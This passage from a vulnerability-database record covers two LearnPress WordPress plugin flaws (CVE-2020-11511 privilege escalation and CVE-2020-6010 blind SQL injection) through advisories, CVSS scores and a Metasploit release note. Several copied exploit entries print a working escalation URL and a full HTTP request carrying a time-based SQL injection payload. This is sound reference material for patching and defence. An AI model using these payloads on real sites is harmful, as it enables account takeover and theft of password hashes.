"https://threatpost.com/critical-wordpress-e-learning-plugin-bugs-cheating/155290/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:19:44", "description": "The LearnPress plugin through 3.2.6.8 for WordPress allows remote attackers to escalate the privileges of any user to LP Instructor via the accept-to-be-teacher action parameter. The \"LP Instructor\" role grants the \"unfiltered_html\" capability, allowing an escalated user to insert posts containing malicious JavaScript\n\n### PoC\n\nIt is possible for a remote attacker to elevate the privileges of any user to LP Instructor by sending a request to any location within wp-admin, such as wp-admin/admin-post.php with the action parameter set to accept-to-be-teacher and the user_id parameter set to an arbitrary user ID. 
This is possible because the learn_press_accept_become_a_teacher function runs on the plugins_loaded action and lacks nonce checks and capability checks.\n", "cvss3": {}, "published": "2020-04-28T00:00:00", "type": "wpvulndb", "title": "LearnPress < 3.2.6.9 - Privilege Escalation to \"LP Instructor\"", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-11511"], "modified": "2020-04-29T05:00:08", "id": "WPVDB-ID:22B2CBAA-9173-458A-BC12-85E7C96961CD", "href": "https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-15T22:19:43", "description": "This could allow a low privilege user, to perform a time based SQL Injection attack and retrieve data from the DB, such as hashed passwords.\n", "cvss3": {}, "published": "2020-04-29T00:00:00", "type": "wpvulndb", "title": "Learnpress < 3.2.6.8 - Authenticated Time Based Blind SQL Injection", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-6010"], "modified": "2020-05-02T05:00:06", "id": "WPVDB-ID:B65A4C93-0F6D-461E-B3E0-7DBE29918335", "href": "https://wpscan.com/vulnerability/b65a4c93-0f6d-461e-b3e0-7dbe29918335", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-04-20T19:54:32", "description": "Privilege Escalation vulnerability discovered in WordPress LearnPress plugin (versions <= 3.2.6.7).\n\n## Solution\n\nUpdate the WordPress LearnPress plugin to the latest available version (at least 3.2.6.8).", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2020-04-29T00:00:00", "type": "patchstack", "title": "WordPress LearnPress plugin <= 3.2.6.7 - Privilege Escalation vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11511"], "modified": "2020-04-29T00:00:00", "id": "PATCHSTACK:30EFAA24C04671FACDE9BBE53776B7B5", "href": "https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-3-2-6-7-privilege-escalation-vulnerability", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T19:54:31", "description": "Authenticated Time Based Blind SQL Injection (SQLi) vulnerability discovered in WordPress LearnPress plugin (versions <= 3.2.6.7).\n\n## Solution\n\nUpdate the WordPress LearnPress plugin to the latest available version (at least 3.2.6.8).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-29T00:00:00", "type": "patchstack", "title": "WordPress LearnPress plugin <= 3.2.6.7 - Authenticated Time Based Blind SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6010"], "modified": "2020-04-29T00:00:00", "id": "PATCHSTACK:039833A50A4F09E67ABD6CBA6645BA7E", "href": "https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-3-2-6-7-authenticated-time-based-blind-sql-injection-sqli-vulnerability", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-03T01:55:52", "description": "", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "zdt", "title": "WordPress LearnPress 3.2.6.8 Plugin - Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11511"], "modified": "2021-07-19T00:00:00", "id": 
"1337DAY-ID-36566", "href": "https://0day.today/exploit/description/36566", "sourceData": "# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation\n# Exploit Author: nhattruong or nhattruong.blog\n# Vendor Homepage: https://thimpress.com/learnpress/\n# Software Link: https://wordpress.org/plugins/learnpress/\n# Version: < 3.2.6.9\n# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd\n# CVE: CVE-2020-11511\n\nPOC:\n1. Find out your user id\n2. Login with your cred\n3. Execute the payload\n\n\nhttp://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>\n\n# Done!\n", "sourceHref": "https://0day.today/exploit/36566", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:52:28", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "zdt", "title": "WordPress LearnPress 3.2.6.7 Plugin - (current_items) SQL Injection (Authenticated) Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6010"], "modified": "2021-07-19T00:00:00", "id": 
"1337DAY-ID-36565", "href": "https://0day.today/exploit/description/36565", "sourceData": "# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)\n# Exploit Author: nhattruong or nhattruong.blog\n# Vendor Homepage: https://thimpress.com/learnpress/\n# Software Link: https://wordpress.org/plugins/learnpress/\n# Version: < 3.2.6.8\n# References link: https://wpscan.com/vulnerability/10208\n# CVE: CVE-2020-6010\n\nPOC:\n1. Go to url http://<host>/wp-admin\n2. Login with a cred\n3. Execute the payload\n\n\nPOST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1\nHost: localhost\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\nAccept: application/json, text/plain, */*\nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nReferer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order\nContent-Type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\nContent-Length: 128\nOrigin: http://localhost\nConnection: close\nCookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145\n\ntype=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items¤t_items[]=1 or sleep(1)-- -\n\n# Modify current_items[] as you want\n", "sourceHref": "https://0day.today/exploit/36565", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": 
"2021-07-19T15:47:10", "description": "", "cvss3": {}, "published": "2021-07-19T00:00:00", "type": "packetstorm", "title": "WordPress LearnPress Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11511"], "modified": "2021-07-19T00:00:00", "id": "PACKETSTORM:163538", "href": "https://packetstormsecurity.com/files/163538/WordPress-LearnPress-Privilege-Escalation.html", "sourceData": "`# Exploit Title: WordPress Plugin LearnPress < 3.2.6.9 - User Registration Privilege Escalation \n# Date: 07-17-2021 \n# Exploit Author: nhattruong or nhattruong.blog \n# Vendor Homepage: https://thimpress.com/learnpress/ \n# Software Link: https://wordpress.org/plugins/learnpress/ \n# Version: < 3.2.6.9 \n# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd \n# CVE: CVE-2020-11511 \n \nPOC: \n1. Find out your user id \n2. Login with your cred \n3. Execute the payload \n \n \nhttp://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id> \n \n# Done! \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163538/wplearnpress-escalate.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-19T15:54:03", "description": "", "cvss3": {}, "published": "2021-07-19T00:00:00", "type": "packetstorm", "title": "WordPress LearnPress SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-6010"], "modified": "2021-07-19T00:00:00", "id": "PACKETSTORM:163536", "href": "https://packetstormsecurity.com/files/163536/WordPress-LearnPress-SQL-Injection.html", "sourceData": "`# Exploit Title: WordPress Plugin LearnPress < 3.2.6.8 - SQL Injection (Authenticated) \n# Date: 07-17-2021 \n# Exploit Author: nhattruong or nhattruong.blog \n# Vendor Homepage: https://thimpress.com/learnpress/ \n# Software Link: https://wordpress.org/plugins/learnpress/ \n# Version: < 3.2.6.8 \n# References link: https://wpscan.com/vulnerability/10208 \n# CVE: CVE-2020-6010 \n \nPOC: \n1. 
Go to url http://<host>/wp-admin \n2. Login with a cred \n3. Execute the payload \n \n \nPOST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 \nAccept: application/json, text/plain, */* \nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nReferer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order \nContent-Type: application/x-www-form-urlencoded \nX-Requested-With: XMLHttpRequest \nContent-Length: 128 \nOrigin: http://localhost \nConnection: close \nCookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145 \n \ntype=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items¤t_items[]=1 or sleep(1)-- - \n \n# Modify current_items[] as you want \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163536/wplearnpress-sql.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2021-02-15T22:19:44", "description": "The LearnPress plugin through 3.2.6.8 for WordPress allows remote attackers to escalate the privileges of any user to LP Instructor via the accept-to-be-teacher action parameter. 
The \"LP Instructor\" role grants the \"unfiltered_html\" capability, allowing an escalated user to insert posts containing malicious JavaScript\n", "cvss3": {}, "published": "2020-04-28T00:00:00", "type": "wpexploit", "title": "LearnPress < 3.2.6.9 - Privilege Escalation to \"LP Instructor\"", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11511"], "modified": "2020-04-29T05:00:08", "id": "WPEX-ID:22B2CBAA-9173-458A-BC12-85E7C96961CD", "href": "", "sourceData": "It is possible for a remote attacker to elevate the privileges of any user to LP Instructor by sending a request to any location within wp-admin, such as wp-admin/admin-post.php with the action parameter set to accept-to-be-teacher and the user_id parameter set to an arbitrary user ID. This is possible because the learn_press_accept_become_a_teacher function runs on the plugins_loaded action and lacks nonce checks and capability checks.", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-05-13T17:36:32", "description": "", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "exploitdb", "title": "WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11511"], "modified": "2021-07-19T00:00:00", "id": "EDB-ID:50138", "href": "https://www.exploit-db.com/exploits/50138", "sourceData": "# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation\r\n# Date: 07-17-2021\r\n# Exploit Author: nhattruong or nhattruong.blog\r\n# Vendor Homepage: https://thimpress.com/learnpress/\r\n# Software Link: https://wordpress.org/plugins/learnpress/\r\n# Version: < 3.2.6.9\r\n# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd\r\n# CVE: CVE-2020-11511\r\n\r\nPOC:\r\n1. Find out your user id\r\n2. Login with your cred\r\n3. Execute the payload\r\n\r\n\r\nhttp://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>\r\n\r\n# Done!", "sourceHref": "https://www.exploit-db.com/download/50138", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-13T05:28:50", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "exploitdb", "title": "WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": 
"AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6010", "2020-6010"], "modified": "2021-07-19T00:00:00", "id": "EDB-ID:50137", "href": "https://www.exploit-db.com/exploits/50137", "sourceData": "# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)\r\n# Date: 07-17-2021\r\n# Exploit Author: nhattruong or nhattruong.blog\r\n# Vendor Homepage: https://thimpress.com/learnpress/\r\n# Software Link: https://wordpress.org/plugins/learnpress/\r\n# Version: < 3.2.6.8\r\n# References link: https://wpscan.com/vulnerability/10208\r\n# CVE: CVE-2020-6010\r\n\r\nPOC:\r\n1. Go to url http://<host>/wp-admin\r\n2. Login with a cred\r\n3. Execute the payload\r\n\r\n\r\nPOST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\r\nAccept: application/json, text/plain, */*\r\nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 128\r\nOrigin: http://localhost\r\nConnection: close\r\nCookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; 
wp-settings-time-3=1626531145\r\n\r\ntype=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items¤t_items[]=1 or sleep(1)-- -\r\n\r\n# Modify current_items[] as you want", "sourceHref": "https://www.exploit-db.com/download/50137", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T12:17:49", "description": "The LearnPress plugin before 3.2.6.9 for WordPress allows remote attackers to escalate the privileges of any user to LP Instructor via the accept-to-be-teacher action parameter.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-30T14:15:00", "type": "cve", "title": "CVE-2020-11511", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11511"], "modified": "2021-08-06T17:25:00", "cpe": [], "id": "CVE-2020-11511", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11511", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T18:45:37", "description": "LearnPress Wordpress plugin version prior and including 3.2.6.7 is vulnerable 
to SQL Injection", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-30T15:15:00", "type": "cve", "title": "CVE-2020-6010", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6010"], "modified": "2021-07-19T18:15:00", "cpe": ["cpe:/a:thimpress:learnpress:3.2.6.7"], "id": "CVE-2020-6010", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-6010", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:thimpress:learnpress:3.2.6.7:*:*:*:*:wordpress:*:*"]}], "rapid7blog": [{"lastseen": "2021-08-27T22:57:32", "description": "## LearnPress authenticated SQL injection\n\n\n\nMetasploit contributor [h00die](<https://github.com/h00die>) added a new module that exploits [CVE-2020-6010](<https://attackerkb.com/topics/x12K9JOfk2/cve-2020-6010?referrer=blog>), an authenticated SQL injection vulnerability in the WordPress LearnPress plugin. When a user is logged in with `contributor` privileges or higher, the `id` parameter can be used to inject arbitrary code through an `SQL` query. 
This exploit can be used to collect usernames and password hashes. The responsible code is located in `learnpress/inc/admin/lp-admin-functions.php` at line `1690`. The vulnerability affects plugin versions `v3.2.6.7` and prior.\n\n## Continuous improvement\n\nIn addition to new exploit modules, Metasploit releases include a number of enhancements and bug fixes. This week we would like to highlight a few key enhancements that improve usability. Contributor [pingport80](<https://github.com/pingport80>) added support for easy reading of binary files from target systems compromised through a PowerShell session. Our very own [sjanusz-r7](<https://github.com/sjanusz-r7>) added a default payload option to the `postgres_payload` module so that payloads update correctly when changing target systems. An enhancement made by our own [gwillcox-r7](<https://github.com/gwillcox-r7>) extends Windows process lib injection beyond just `notepad.exe`. The logic now selects from a random list that can be updated in the future. We appreciate all the contributions that make Metasploit more robust and easier to use.\n\n## New module content (1)\n\n * [Wordpress LearnPress current_items Authenticated SQLi](<https://github.com/rapid7/metasploit-framework/pull/15593>) by [Omri Herscovici](<https://twitter.com/omriher>), [Sagi Tzadik](<https://twitter.com/sagitz_>), [h00die](<https://github.com/h00die>), and [nhattruong](<https://github.com/truongtn>), which exploits [CVE-2020-6010](<https://attackerkb.com/topics/x12K9JOfk2/cve-2020-6010?referrer=blog>) \\- This collects usernames and password hashes from Wordpress installations via an authenticated SQL injection vulnerability that exists in LearnPress plugin versions below `v3.2.6.8`.\n\n## Enhancements and features\n\n * [#15384](<https://github.com/rapid7/metasploit-framework/pull/15384>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This consolidates and changes the library code used by exploits that use RDLLs. 
The changes improve upon the logic used to start a process to host the RDLL so it is no longer notepad.exe but randomly selected from a list that can also be updated in the future.\n * [#15477](<https://github.com/rapid7/metasploit-framework/pull/15477>) from [pingport80](<https://github.com/pingport80>) \\- This adds PowerShell session support to the `readable?` and `read_file` functions provided by the `Post::File` API.\n * [#15580](<https://github.com/rapid7/metasploit-framework/pull/15580>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- Updates `postgres_payload` exploit modules to specify a valid default PAYLOAD option when changing target architectures\n * [#15584](<https://github.com/rapid7/metasploit-framework/pull/15584>) from [h00die](<https://github.com/h00die>) \\- Updates the list of WordPress plugins and themes to allow users to discover more plugins and themes when running tools such as `auxiliary/scanner/http/wordpress_scanner`\n\n## Bugs fixed\n\n * [#15496](<https://github.com/rapid7/metasploit-framework/pull/15496>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Users can now specify the SSL version for servers with the `SSLVersion` datastore option, ensuring compatibility with a range of targets old and new.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.1...6.1.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-20T05%3A13%3A43-05%3A00..2021-08-26T11%3A21%3A14-05%3A00%22>)\n * [Full diff 6.1.1...6.1.2](<https://github.com/rapid7/metasploit-framework/compare/6.1.1...6.1.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
